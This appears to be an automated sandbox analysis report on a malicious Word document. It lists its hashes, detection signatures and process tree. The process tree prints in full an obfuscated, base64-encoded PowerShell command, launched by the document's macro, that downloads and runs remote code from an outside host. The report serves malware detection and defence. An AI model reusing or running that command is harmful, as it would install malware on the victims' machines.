Edit tour
Windows
Analysis Report
DUD6CqQ1Uj.doc
Overview
General Information
Sample name: | DUD6CqQ1Uj.docrenamed because original name is a hash value |
Original sample name: | 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb.doc |
Analysis ID: | 1584650 |
MD5: | 4fd8d5da5cd2109c730052735c9ccbb6 |
SHA1: | 2d175610936cdfc27380c13d89f5883db532d2b2 |
SHA256: | 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb |
Tags: | docuser-zhuzhu0009 |
Infos: | |
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- WINWORD.EXE (PID: 7764 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\WINWO RD.EXE" /A utomation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678) - powershell.exe (PID: 7204 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe -e SQBFAFgAI AAoAE4AZQB 3AC0ATwBiA GoAZQBjAHQ AIABOAGUAd AAuAFcAZQB iAEMAbABpA GUAbgB0ACk ALgBEAG8Ad wBuAGwAbwB hAGQAUwB0A HIAaQBuAGc AKAAnAGgAd AB0AHAAcwA 6AC8ALwBlA HQAZQByAG4 AYQBsAC4Ab ABvAGwALwB mAGkAbABlA C8AOABlADU AMwBhADMAZ QAwADIAMwA yADEAOABhA DkAYgAxAGU AZgA5AGIAY QAxAGUAZgA zAGIANQBhA GYAZAAxADk AMQBhADkAO QAxADUANgB iADcANwA4A DYANAA1ADU AOABkAC8AO ABlAGUAZgA 0AGQAZgAzA DgAOABmADI AMgAxADcAY wBhAGUAYwA zAGQAYwAyA DYALgBqAHA AZwAnACkAO wBvAGEAdwB uAGQAdQBhA HcAZABuAG4 AaABuADkAM gA4ADMAaAA xADkAMgAxA G4AYQB3AG8 AZABhAG4AZ gBpAGEAdwB iAGQAbgBpA HUAZgBiAG4 AYQBpAGQAd wB1AGEAaQB mAHUAYQBiA GkAdQBmAGI AYQBpAHUAZ ABiAGgAagB hAHcAZABiA GEAZgBoAGo A"" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |